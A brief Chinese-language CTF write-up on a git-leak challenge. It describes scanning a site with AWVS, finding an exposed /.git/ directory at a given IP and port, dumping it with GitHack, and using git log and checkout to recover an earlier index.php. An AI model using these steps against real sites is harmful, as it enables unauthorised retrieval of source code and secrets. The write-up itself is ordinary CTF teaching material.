某ctf的git泄漏题

正文

对网站进行进行目录扫描(AWVS),发现存在git泄漏。
路径 http://123.207.178.76:8105/.git/

使用的利用工具是GitHack(建议clone最新版本)。
https://github.com/lijiejie/GitHack
其他操作

1
2
3
4
5
python GitHack.py http://123.207.178.76:8105/.git/
# 进入目录,进行回滚操作
git log
git checkout "ea2b29"
cat index.php